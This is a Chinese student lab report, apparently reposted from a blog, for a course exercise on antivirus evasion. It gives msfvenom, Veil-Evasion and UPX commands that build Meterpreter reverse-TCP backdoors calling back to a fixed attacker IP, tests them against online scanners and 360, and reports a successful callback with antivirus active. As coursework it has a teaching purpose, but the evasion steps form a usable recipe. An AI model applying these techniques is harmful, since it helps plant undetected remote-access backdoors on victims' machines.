20155232《网络对抗》Exp3 免杀原理与实践

于 2018-04-08 21:13:00 发布
阅读量106 收藏
点赞数
文章标签: c/c++ 操作系统 运维
原文链接:http://www.cnblogs.com/lsqsjsj/p/8747531.html
版权

20155232《网络对抗》Exp3 免杀原理与实践

问题回答

  • 1.基础问题回答

(1)杀软是如何检测出恶意代码的?

基于特征码的检测

特征码:一段特征码就是一段或多段数据。

如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码。

启发式恶意软件检测

根据些片面特征去推断。

通用性,不精确。

基于行为的恶意软件检测

修改文件硬盘、连接恶意网站、修改注册表

(2)免杀是做什么?

通过一些手段来瞒过杀软的检测扫描。避免被杀毒软件查杀。

(3)免杀的基本方法有哪些?

改变特征码:如果有exe可以加壳,有shellcode可以用encode进行编码,有源代码可以用veil-evasion进行重写再编译。

改变行为
尽量使用反弹式连接、使用隧道技术
基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码

  • 2.离实战还缺些什么技术或步骤?

实战靶机不会乖乖被你植入一个后门程序,并没有这么理想的情况,也不可能出现让你多次尝试连接还没有被察觉的情况,难度就会大大加强。而且现在各种杀毒软件的病毒库在不断地更新,所以需要探索出新的方法在实战中去应用。

实践内容

1.使用msf生成后门程序的检测

直接用上个实验的20155232_backdoor.exe进行检测,但是提示说不能有数字,所以修改名字后检测:
1065408-20180403152033072-160272513.png

1065408-20180403152041092-810071154.png

1065408-20180403152046666-1313822483.png

  • 扫描结果:46%的杀软(18/39)报告发现病毒.

2.Msfvenom使用编码器生成meterpreter可执行文件

  • 可以尝试多编码几次比如10次,理论上肯定比一次好些...但上课时老师说编码器可能就本身会被发现。
    就多编码几次试试,看看能不能好点,就试十次吧:在指令里加上
i 10

1065408-20180403153504343-517306939.png

1065408-20180403154027708-1674547499.png

  • 扫描结果:48%的杀软(19/39)报告发现病毒,所以这个方法并不够免杀。

使用命令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.229.137 LPORT=443 -f war > java_backdoor.jar

生成jar文件

出现错误:
1065408-20180409170451607-309401191.png

然后将名字进行修改即可,。。。

1065408-20180409170544340-60274223.png

哇塞还不错哦
39个杀毒软件5个报毒。
将程序复制到带杀软的win10中,没有任何反应。
---

3.veil-evasion生成可执行文件

在尝试安装和下载veil的安装包进行安装失败
又使用命令sudo apt-get 也失败后,使用了从老师那里拷贝的虚拟机~

  • 命令行直接输入veil打开软件
  • 根据menu提示依次输入下面的指令

问题

之前在输入python的时候提示错误

use python/meterpreter/rev_tcp.py

1065408-20180408164746645-161436681.png

解决

于是选择换成c,重复上面的操作,发现ok了,可以生成可执行文件啦。

  • 根据menu提示依次输入下面的指令


# list
# use 7
  • 接着是设置LHOST和LPORT
set LHOST 192.168.229.137
set LPORT 5232
generate

1065408-20180407203412667-889556923.png

  • 设置你想生成的文件名
    1065408-20180407203547707-1963908754.png

  • 成功~

1065408-20180407203646999-215470435.png

  • 按照路径去复制此文件

注意

需要切换到图中标出来的目录才能找到此文件,在进行搜索:

1065408-20180407205150240-207448550.png

1065408-20180407205154324-1628052473.png

1065408-20180407205302119-1029189690.png

  • 扫描一下:
    1065408-20180407205357856-641891868.png

1065408-20180407205714971-102106469.png

在拷贝到win10的过程中,没有被拦截。
结果是比MSF进步了很多,只有8个引擎检测出来了有后门。

实验了一下360也没能查杀出来:
突然觉得360有点菜啊。。。。=v=!

1065408-20180407210142240-1708917671.png

4.C语言调用Shellcode

  • 下面指令会生成一个c语言格式的Shellcode数组。
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.137 LPORT=443 -f c

1065408-20180407211359297-924773446.png

  • 使用命令将该C语言代码转换为一个可在64位windows系统下操作的可执行文件

1065408-20180407212135590-319057996.png

VirSCAN.org检测结果如下:

1065408-20180407212644185-276032027.png

  • 根据老师提供的链接下载安装vs。并且选择桌面开发c++。

1065408-20180408155455513-1605781368.png

  • 进行编译运行,生成了exe文件:

1065408-20180408175841950-1813606641.png

1065408-20180408180212932-1075146909.png

放在网站上扫描一下~

比之前少了很多~
还是不错滴~

1065408-20180408180744619-454785989.png

  • 在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口,进行回连:

1065408-20180408181146902-484666818.png

回连成功:
1065408-20180408181335326-2030473506.png

360依旧没有扫描出来~

5.加壳

  • upx是一种压缩程序,可以实现加壳的功能,这里简单介绍该指令加壳的命令格式:
upx 需要加壳的文件名 -o 加壳后的文件名

1065408-20180408182343750-977279987.png

  • 检测一下

1065408-20180408184443581-2040191127.png

感觉没有太大的变化。。。哈哈哈加壳后查杀率不但没有减少反而相比上一个提高了,360也提醒我有木马病毒,让我赶紧清理。
说明这个方法实现不了免杀。。

6.通过组合应用各种技术实现恶意代码免杀
加壳+veil-evasion

1065408-20180408193901566-525876210.png

在将生成的文件进行扫描:

1065408-20180408200133398-420275316.png

跟上一种情况比起来差不多~哈哈哈哈
不过360没有扫描出来~

1065408-20180408205925373-418188690.png

6.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

1065408-20180409174148572-1622713587.png

总结体会

在这次的实验里安装veil出现了不少问题,最终也没有解决,就用了老师的虚拟机。。。然后通过这次实验可以了解到,实现免杀的技术有很多种,需要慢慢学习和探索,很多免杀的方法见都没见过,有的也没有看懂,对于软件生成来说,很容易暴露特征,而自己手工编写更能实现免杀。最重要的电脑主机的杀毒软件需要进行更新,而且选择一个好的软件也很重要。

转载于:https://www.cnblogs.com/lsqsjsj/p/8747531.html

aoqian2533
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值